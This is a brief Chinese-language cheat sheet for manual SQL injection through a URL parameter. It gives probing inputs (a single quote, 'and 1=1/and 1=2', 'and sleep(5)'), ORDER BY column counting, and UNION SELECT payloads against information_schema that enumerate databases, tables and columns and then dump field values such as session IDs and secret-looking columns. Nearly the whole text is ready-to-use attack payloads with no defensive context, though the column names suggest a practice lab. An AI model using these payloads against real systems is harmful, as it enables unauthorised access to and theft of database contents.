查找注入點
在url中:
1. '
2. and 1=1/and 1=2
3. 隨即輸入(整形)
4. -1/+1回顯上下頁面(整形)
5. and sleep(5) (判斷頁面返回時間)
判斷有多少列
order by .....
爆顯示位:
id=88888888') union select 1,2,3 --+
先獲取數據庫:
id=') union select 1,2,group_concat(distinct+table_schema) from information_schema.columns --+
再獲取數據庫的所有表:
id=') union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema='庫名' --+
再獲取表中的字段:
id=') union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name='表名' --+
再獲取字段信息:
id=') union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 庫名.表名--+